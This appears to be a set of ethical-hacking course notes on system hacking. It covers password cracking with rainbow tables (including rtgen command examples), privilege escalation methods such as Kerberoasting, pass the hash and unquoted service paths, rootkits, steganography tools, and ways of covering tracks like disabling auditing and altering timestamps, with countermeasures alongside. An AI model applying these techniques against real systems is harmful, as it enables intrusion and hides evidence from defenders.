System Hacking

rtsort

A rainbow table is an array of rainbow chains. Each rainbow chain has a start point and an end point. The rtsort program sorts the rainbow chains by end point to make a binary search possible. Use the rtsort .command to sort all .rt rainbow tables in current directory. Please be aware that after rtsort, the command includes a space and then a period.

hash_algorithm

A rainbow table is hash algorithm specific. A rainbow table for a certain hash algorithm helps to crack only hashes of that type. The rtgen program natively support lots of hash algorithms, like lm, ntlm, md5, sha1, mysqlsha1, halflmchall, ntlmchall, oracle-SYSTEM, and md5-half. In the example above, we generated md5 rainbow tables that speed up the cracking of md5 hashes.

Rootkits

A rootkit is a software program that hackers use to establish root- or admin-level privileges to a system. Rootkits are a set of programs designed to covertly access a system and allow the hacker to control its functions. Using a rootkit, a hacker can hide added applications and processes, obtain sensitive data, and set up the system to act as a server for bot updates. Rootkits can modify the operating system and the utilities of the target system. Rootkits contain packet sniffers, utilities that remove logs, DDoS programs, IRC bots, and backdoor programs. The following table describes two tools to create rootkits: GrayFish Sirefef

GrayFish

A rootkit tool that runs within the Windows operating system. It contains hidden storage and has invisible command execution. GrayFish isn't flagged in anti-rootkit scans because it sets no hooks on Window kernel functions and doesn't register callback functions.

C++ sourcecode steganography

A set of tools is hidden in the C++ code.

StegoStick

A steganography tool that allows a file to be hidden within any image, audio, or video file, even in PDFs and EXE files.

OPH Crack

A tool for cracking Windows login passwords. It uses rainbow tables and has the capability to crack hashes from many formats. It is an open-source program and free to download.

OpenStego

A tool for hiding data in a cover file or watermarked files. It can be used to trace file copying.

DeepSound

A tool for hiding data in audio files and extracting files from audio tracks. It also has the option to encrypt the files.

Disable Auditing

After gaining administrative access to a system, a hacker will typically install reconnaissance tools such as keyloggers to obtain logins and passwords. This action will be recorded in either the event login Windows or the syslog of Linux and other systems. These logs can be programmed to alert system administrators. To disable auditing, a hacker can use the Auditpol.exe command line utility to remotely change the audit security settings. AuditPol can be used to disable security auditing on either local or remote systems. It can also be used to enable auditing after the attack is over to avoid suspicion. A hacker can use Auditpol.exe to alter the audit criteria for categories of security procedures.

Modify Timestamps

Another method to cover tracks is to alter the timestamp on files. Each file gets stamped with a time and date each time it is created, accessed, or modified. You can use the following tools to do this: Timestomp Touch ctime Meterpreter

NTFS Data Streaming

Another way that hackers can hide programs is through NTFS alternate data streams (ADS). When a file is created or copied to NTFS, one data stream stores the attributes, and a second stores the data. NTFS allows each file an unlimited number of data streams with unlimited size. Because they are hidden, a hacker can inject malicious code into these alternate data streams and execute the code without being detected by the user or system administrator. To get rid of malicious alternate data streams, move suspect files to a partition or device that is formatted using FAT. Since FAT doesn't support alternate data streams, the alternate file streams will be removed when the file is moved. Remember to keep your antivirus software updated. Some tools that detect and remove infected ADS include LADS, Stream Detector, LNS, and Forensic Toolkit.

Hide Evidence

Another way to cover tracks is to hide the evidence. Following are methods a hacker can use to hide files. Choosing the hidden option in the file attributes menu will hide the file from directory listings and from browsing in Windows Explorer. Placing a period at the beginning of a Linux, Unix, and OS X file name hides the file. Placing the file in the unused or slack space of an existing file can hide a file. Because the file size was defined previously, there will be no indication that data was added to the file, and the data doesn't typically show up when opening the file. Incorporating the file in the ADS can hide it. ADS was created to allow compatibility with Macintosh files. One of its features is the ability to have multiple streams of data simultaneously. The alternate stream of data isn't seen in Windows Explorer. Using executables that can be activated from the command line, but will remain unseen. This allows the hacker to actively run programs undetected.

Writable services

Another way to exploit a service is to search for admin level accounts that have services that are writable. Services with weak permissions allow anyone to alter the execution of the service. This may include creating a new admin user account that gives the hacker rights to do whatever the admin account can do.

To prevent rootkits, take the following steps:

Back up critical data and reinstall the OS and applications. Install and routinely update firewalls. Patch and regularly update the OS and applications. Keep a record of automated installation procedures. Harden servers and network stations. Train users to confirm that downloads are from a trusted source. Check for rootkits through a kernel memory dump analysis.

Ccleaner

Ccleaner is a cleaning tool that can remove files and clears internet browsing history. It also frees up hard disk space. It clears the temporary files, history, and cookies from each of the six major search engines.

There are additional tools available to help cover tracks:

Ccleaner, Clear My History, Dump event log

Image

Check for changes in format, size, the color palette, and the last modified timestamp.

Text

Check for extra spaces and invisible characters. Look for unusual patterns in spacing, fonts, line heights, and even in the language.

Clear My History

Clear My History is software that can clear cookies, stored data like passwords, browser history, and temporary cached files. It can clear the recycling bin, clipboard data, and recent documents lists as well.

Crackers

Crackers are software programs that crack code and passwords to gain unauthorized access to a system. There are many methods and tools available for this approach such as dictionary, brute force, and rainbow attacks.

Cross view-based detection

Cross view-based detection uses an algorithm as it goes through the system files, processes, and registry keys to create a baseline that is compared to the data returned by the operating system's APIs.

DLL hijacking

DLL hijacking can happen during an application installation. When loading an external DLL library, Windows usually searches the application directory from which the application was loaded before attempting a fully qualified path. If an attacker has installed a malicious DLL in the application directory before the application installation has begun, then the application will choose the malicious DLL.

Spam/emailsteganography

Data is embedded in an email.

Clear text credentials in LDAP

Data transferred unencrypted or in clear text is vulnerable to hackers. Beware, however, most domain controllers allow clear text credentials to be transmitted over the network, even to and from the local directory. You can check for clear text transfers by using the unsecure LDAP bind script in PowerShell. PowerShell will deliver a CSV file as output, showing you which accounts are vulnerable.

The following tools aid in steganography detection:

Discover the Hidden, StegoHunt, Gargoyle, StegAlyzerSS, Virtual Steganographic Laboratory (VSL), Stegdetect

Non-Technical Password Attacks

Dumpster diving, Social engineering, Shoulder surfing

ERD Commander

ERD Commander software is designed to correct problems that can occur when rebooting after you install new software on a Windows NT system. It allows users access to the command prompt to perform basic system maintenance tasks during the boot process.

Videosteganography

Files with extensions can be hidden in video files such as .MPG4, .AVI, and .WMV.

Privilege Escalation Techniques

Hackers can escalate privileges in the following ways: cPassword Clear text credentials in LDAP Kerberoasting Credentials in LSASS SAM database Unattended installation DLL hijacking

How can hackers maintain access?

Hackers like to keep access to the systems they have gained admin or root access to. They also work hard to keep other hackers out of the system. At the admin or root level, they have the ability to download or upload anything, capture and manipulate data, and configure applications and services. They can also use the system to exploit other systems. The following lists a few ways a hacker can maintain access: Path interception Writable services Unsecure file and folder permissions

Heuristic or behavior-based detection

Heuristic or behavior-based detection searches for deviations in normal behaviors and patterns of an operating system. One of the patterns it searches for is execution path hooking which allows a function value in an accessible environment to be changed. This is a behavior used by rootkits.

Credentials in LSASS

In Microsoft Windows, the local security authority sub-system service (LSASS) is a file in the directory that performs the system's security protocol. It's an essential part of the security process as it verifies user logins, creates access tokens, and handles password changes. This file is susceptible to corruption by viruses or Trojan horses. LSASS is a critical component of domain authentication, Active Directory management on the domain system, and the initial security authentication procedure. If it's compromised, an attacker can easily escalate privileges in the network.

Brute force

In a brute force attack, every password will eventually be found because its technique is to test every possible keystroke for each single key in a password until the correct one is found. The disadvantages of this type of attack are that it takes a large amount of processing power to execute and it is very time consuming.

Dictionary

In a dictionary attack, word lists, often taken straight from dictionaries, are tested against password databases. Besides all the standard words you find in a dictionary, these lists usually include variations on words that are common for passwords, such as pa$$word. Lists can also include simple keyboard finger rolls like q-w-e-r-t1234. The down side to this attack is this process can take a very long time to crack the passwords. Two common tools for dictionary attacks are Brutus and Hydra.

Integrity-based detection

Integrity-based detection works by running a tool to scan a clean system to create a database. The integrity-based detection scans the system and compares the current scan to the clean database. Any dissimilarities between the clean baseline database and the current scan are flagged and a notification is sent.

Several methods used to detect and identify rootkits include:

Integrity-based detection, Signature-based detection, Heuristic or behavior-based detection, Runtime execution path profiling, Cross view-based detection

Kerberoasting

Kerberos is a protocol that allows authentication over a non-secure network by using tickets or service principal names (SPNs). A user authenticates to the server, which forwards the user name to the key distribution center (KDC). The KDC issues a ticket-granting ticket (TGT) that is encrypted using the ticket granting service (TGS). An encrypted ticket will be returned. A brute force can be used offline to crack this ticket to reveal the service account password in plain text. This process is called Kerberoasting. There is no risk of detection and no need for escalated privileges, and the process is easy to perform.

Keylogger

Keystrokes on the computer keyboard are logged or recorded to obtain passwords and other important data. This can be done through either hardware devices or software programs on an individual computer or on a whole network. The user cannot detect the keylogger software, and the information can be recorded before it is encrypted. A hardware keylogger is a physical device that looks like a regular USB drive. It is installed between a keyboard plug and a USB port. Every stroke of the keyboard is stored on the device, and a hacker has to retrieve it to get the data that is stored. The advantage of this type of keylogger is that it is undetectable by desktop security, as well as antispyware and antivirus programs. The disadvantage is that it is easy to find it because it is physically plugged into the computer. Tools include PC Activity Monitor, RemoteSpy, Veriato, Investigator, and KeyStrokeSpy. Software keyloggers are installed through an opened email attachment or remotely through a network. An advantage of this type of keylogger is that it has no memory limitations because the data is stored on a remote computer hard drive.

Audio

Look for distortions and patterns in frequencies that are above or below the human range of hearing.

Meterpreter

Meterpreter is Metasploit's payload. It has many features for covering tracks, including the ability to launch a fileless attack.

Unsecure file and folder permissions

Older versions of Windows allow administrators to access the files and folders of any non-admin user. This can lead to DLL hijacking and malicious file installations on a non-admin targeted user.

OmniHide Pro

OmniHide Pro can hide files in photos, movies, documents, and music. It allows the user to create a password to make the hidden file more secure.

Pass the hash

Pass the hash is a hacking technique where an hacker uses an underlying NTML or hash of a user's password to gain access to a server without ever using the actual plain text password. Pass the hash is dangerous to an organization because once a hacker gains access, the entire organization can be compromised very quickly. To execute a pass the hash attack, first, a hacker gains access to an individual computer through malware or another technique. Then the hacker can access the system's memory and find stored hashes from other users that have used that workstation. The hacker can then gain access to other workstations in the network and search each workstation for stored hashes until it finds a hash that gives access to a high-level administrator account. Once that happens, the hacker has access to the entire network as an administrator.

Rainbow

Rainbow attacks are like dictionary attacks, but instead of endlessly testing dictionary lists, this method uses tables that are precomputed with word lists and their hashes. This is much quicker than a dictionary attack or a brute force attack. When a plain text password is stored, it is processed through a one-way function and converted into a hash. Hashes are then converted into plain text through another one-way function called reduction. This new plain text is not the same plain text that was originally hashed. Passwords often go through this encryption process multiple times, making a chain. Rainbow tables store only the starting plain text and the final hash of these chains. A hacker searches the table for a possible hash and tries to retrieve the password that it was converted from. The rainbow table gets its name from having a different reduction function in each column in the chain. This allows the hacker to quickly crack the password by passing through tables which will work backwards through the chain to identify the original password.

RainbowCrack

RainbowCrack is software that cracks hashes by rainbow table lookup. The rtgen program generates rainbow tables, and the rtsort program sorts them. The following table describes these two programs. rtgen rtsort

Runtime execution path profiling

Runtime execution path profiling checks for variations in the runtime execution path of all executable files and system processes.

SAM database

Security Account Manager (SAM) is a database that stores user passwords in Windows as an LM hash or an NTLM hash. This database is used to authenticate local users and remote users. It doesn't store the domain system user credentials like the LSASS database does; rather, it stores the system's administrator recovery account information and passwords. While the SAM file can't be copied to another location, it is possible to dump the hashed passwords to an offsite location where the passwords can be decrypted with a brute force method.

Signature-based detection

Signature-based detection scans a system's processes and executable files looking for byte sequences of known malicious rootkit programs.

Sirefef

Sirefef, also known as ZeroAccess, has virus, Trojan horse, and rootkit components. As a rootkit, it is unseen by antivirus and anti-spyware programs. It hides by changing the internal process of the target operating system. Sirefef is difficult to remove and can create problems with Windows Firewall and Defender Service, remote hosts, and browser settings. It creates a folder to store additional malware.

Sniffing

Sniffing is a passive way for a hacker to gain access to an account. The sniffer collects data that is in transit in a LAN. If access is gained on one system in a LAN, then more data can be gathered from data transmissions to any other system in the network. The sniffer runs in the background, making it undetectable to the victim. Sniffing tools include Wireshark, TCPDump, and Recon-ng.

Spam Mimic

Spam Mimic encodes data into emails and has the ability to decode the messages.

Spyware

Spyware is malware that works by stealth to capture information and sends it to a hacker to gain access. Spyware can be keystroke logging, activity tracking, screen captures, or file operations. Spyware can be unintentionally installed by a user through normal web activity and it is often undetected. Hackers may install backdoors into the system to maintain access to the spyware.

Steganography

Steganography is the method of embedding data into legitimate files like graphics, banner ads, or plain text messages to hide it and then extracting the data once it reaches its destination. It is very difficult to detect and has become a very popular method for hackers. Steganography can hide identities, communication, code, and content. Hackers can use steganography as an alternative to encryption because data hidden in steganography doesn't have to be encrypted. However, encrypted steganographic information is even more difficult to decipher. The following table describes several types of steganography. Imagesteganography Videosteganography Document or whitespacesteganography Audiosteganography Websteganography C++ sourcecode steganography Spam/emailsteganography

The following table lists tools used to create steganography.

StegoStick, OpenStego, OmniHide Pro, DeepSound, Spam Mimic

Erase or Modify Evidence

System log files are the first place to check for questionable activity. Typically, hackers erase only the parts of the logs that show hacking actions. To the extent possible, a hacker makes the log appear as it did before the attack. This can be done without admin privileges. Hackers commonly delete the following logs in Windows files: SECEVENT.EVT logs failed logins and file access without privileges. SYSEVENT.EVT logs anomalies in system operations and driver failure. APPEVENT.EVT logs application variants. These files are continuously open, running, and logging activity. A good hacker will remove any unnecessary files that were added during the hack and remove information in the files that were generated by the attack.

While it is difficult to detect steganography, there are some actions you can take. The table below identifies where to look for steganography files.

Text, Image, Audio, Video

charset

The charset includes all possible characters for the plain text. Loweralpha-numeric is represented by abcdefghijklmnopqrstuvwxyz0123456789, which is defined in configuration file charset.txt.

Websteganography

The data is hidden behind a web object when uploaded to the server.

Audiosteganography

The data is hidden in a digital sound format through least signification bit (LSB) manipulation.

Document or whitespacesteganography

The data is hidden in added white spaces and tabs at the end of lines.

Dump event log

The dump event log command line tool in Windows 2000 dumps an event log remotely or on a local system into a tab-separated text file. It can also be used to filter specific types of events.

Tools

The following identifies tools hackers can use to elevate privilages. Trinity Rescue Kit ERD Commander OPH Crack

What are other ways hackers maintain access?

The following table describes additional ways a hacker can establish continued access to the systems they hack. Backdoors Crackers Spyware Scheduled Tasks

Imagesteganography

The most common form of steganography is hiding information in image files.

Countermeasures

The most effective way to protect against privilege escalation is to tighten privileges to make sure that users have only the privileges that they need. This prevents escalation if an attacker gains access to an account that has higher privileges than it needs. Once privileges are tightened, focus on these steps: Encrypt sensitive information. Implement multi-factor authentication and authorization. Restrict interactive logon privileges. Scan the operating system and application coding regularly for bugs and errors. Frequently perform updates on the operating system and applications. Install auditing tools to continuously monitor file system permissions. Use fully qualified paths in Windows applications. Select Always Notify in the UAC settings.

chain_num

The number of rainbow chains to generate. A rainbow table is simply an array of rainbow chains. The size of each rainbow chain is 16 bytes.

chain_len

The rainbow chain length. A longer rainbow chain stores more plain texts and requires longer time to generate.

Social engineering

The social engineering attack relies on human error. The hacker convinces an employee or other authorized person to give him a password.

table_index

The table_index parameter selects the reduction function. Rainbow tables with a different table_index parameter use different reduction functions.

Touch

The touch command in Linux, Unix, and OSX can be used to alter the timestamp as well. It can change the time to the current time or to any specific time.

Cover Tracks

There are many ways to clear online tracks: Browse in private mode Delete history in address field and stored history Clear cookies and caches Delete downloads, saved sessions, and user JavaScript Disable the password manager and clear its data Create multiple users Clear Most Recently Used and toolbar data

Password Cracking Countermeasures

There are several things you can do to counter password cracking attempts: Password salting is a strategy used to make cracking passwords more difficult by adding random bits of data to a password before it is stored as a hash. This is made possible by a one-way function that makes it almost impossible to return the hashed password back to the original password. The more complex a password, the harder it is to crack. Use 8 to 12 characters combining numbers, uppercase and lowercase letters, and special symbols. Never share your passwords. If asked to routinely change your password, do not reuse your current password. Never use words from a dictionary as your password. Change your passwords every 30 days. Never store a password in an unsecure location. Never use a default password. Never store passwords in a protocol with weak encryption or clear text.

plaintext_len_min plaintext_len_max

These two parameters limit the plain text length range of the rainbow table. In the example above, the plain text length range is 1 to 7. So plain texts such as abcdefg are likely contained in the rainbow table generated. But plain text abcdefgh with length 8 will not be contained.

Dumpster diving

This non-technical method of attack relies on finding sensitive information that has been discarded in garbage cans, dumpsters, or other unsecure places that a hacker has access to.

Shoulder surfing

This technique involves watching and recording a password, pin, or access code that is being entered by someone in close proximity.

Timestomp

Timestomp is a tool for modifying or deleting a file's timestamp in order to hide when the file was created, accessed, or modified. Hackers change times and dates to blend in with existing timestamps so as to not alert digital forensic investigators of access or exploitation.

part_index

To store a large rainbow table in many smaller files, use a different number for each part, and keep all other parameters identical.

Trinity Rescue Kit

Trinity Rescue Kit (TRK) helps with repair and recovery operations on Windows machines. It is a great tool for maintenance. It has many functions, including resetting passwords, scanning for viruses, running a disk cleanup, and fixing bugs.

Video

Use a combination of the methods used for audio and image files to search for hidden information.

Path interception

When an executable such as an app, service, or process is started, the system looks for a path for the file that runs it. There is no problem if the path is written within quotation marks and has no spaces. However, if the path name doesn't have quotation marks around it and there are spaces in the path name, there is an opportunity for a hacker to add a path that routes to a malicious file. Executables called on a regular basis can provide continued access to a system. Executables started by a higher privileged process can give the hacker elevated privileges, allowing the hacker to create a new user in the system with administrator rights providing ongoing system access. Here is an example: Trusted Path: Path to executable: "c:\programfiles\subdirectory\programname.exe" Exploitable Path: Unquoted path with spaces: c:\program files\sub directory\program name.exe

Backdoors

When hackers gain access to a system, often they establish a way to get back into it again later. This is referred to as a backdoor. Typically, a hacker will install a rootkit, Trojan horse, or a remote access Trojan (RAT). Rootkits have access at the operating system level and Trojans have access at the application level. As previously discussed, a hacker may create a new user to obtain access.

Scheduled Tasks

When processing task files, Windows Task Scheduler has a vulnerability in its validation of the files. It has a default configuration that allows regular users to write task files. An attacker can modify a task file to execute malicious commands. This method can be used to escalate privileges, maintain access, perform remote execution, and implement malicious programs at system startup.

Unattended installation

While it is convenient and sometimes necessary, to install a program throughout a network without having to sit at every computer, there are risks. If the administrator fails to clean up after the installation, a file called Unattended is left on the individual workstations. The Unattended file is an XML file and has configuration settings used during the installation that can contain the configuration of individual accounts including admin accounts. This makes privilege escalation easy. To avoid additional risks: Give only the privileges needed for the installation when creating the answer file for an unattended installation. Ensure credentials are encrypted when a network admin is installing over a network. Secure the image created for the installation.

ascii-32-95

[ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~]

ascii-32-65-123-4

[ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`{|}~]

numeric

[0123456789]

alpha-numeric-symbol32-space

[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/]

alpha-numeric

[ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]

alpha

[ABCDEFGHIJKLMNOPQRSTUVWXYZ]

lower alpha-numeric

[abcdefghijklmnopqrstuvwxyz0123456789]

mix alpha-numeric

[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]

mix alpha

[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]

lower alpha

[abcdefghijklmnopqrstuvwxyz]

cPassword

cPassword is the name of the attribute that stores passwords in a Group Policy preference item in Windows. This attribute is easy to exploit because Microsoft publishes the public key for the Group Policy preferences account credentials. These preferences allow domain admins access to create and change any local user or local admin account. Cpasswords are stored in an encrypted XML file in the SYSVOL folder on the domain controllers. This allows any domain authenticated user access to decrypt the password.

ctime

ctime is a header file that contains definitions of functions to get and manipulate date and time information.

Program options for rtgen are described in the following table.

hash_algorithm, charset, plaintext_len_min plaintext_len_max, table_index, chain_len, chain_num, part_index

The following shows the hash types and their possible characters or values.

numeric, alpha, alpha-numeric, lower alpha, lower alpha-numeric, mix alpha, mix alpha-numeric, ascii-32-95, ascii-32-65-123-4, alpha-numeric-symbol32-space

rtgen

rtgen generates rainbow tables based on parameters specified by user. The command line syntax of rtgen program is: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index An example of commands used to generate a rainbow table set with 6 rainbow tables is: rtgen md5 loweralpha-numeric 1 7 0 3800 33554432 0rtgen md5 loweralpha-numeric 1 7 1 3800 33554432 0rtgen md5 loweralpha-numeric 1 7 2 3800 33554432 0rtgen md5 loweralpha-numeric 1 7 3 3800 33554432 0rtgen md5 loweralpha-numeric 1 7 4 3800 33554432 0rtgen md5 loweralpha-numeric 1 7 5 3800 33554432 0

Technical Password Attacks

t's natural for people to want easy-to-remember passwords or to use the same password for multiple systems and websites. A surprising number of people use the password abc123, a pet's name, or a hobby as a password. The weakness in this convenience is that these are all easy for an hacker to guess. The following tables describes common types of technical password attacks. Dictionary Brute force Pass the hash Sniffing Keylogger Rainbow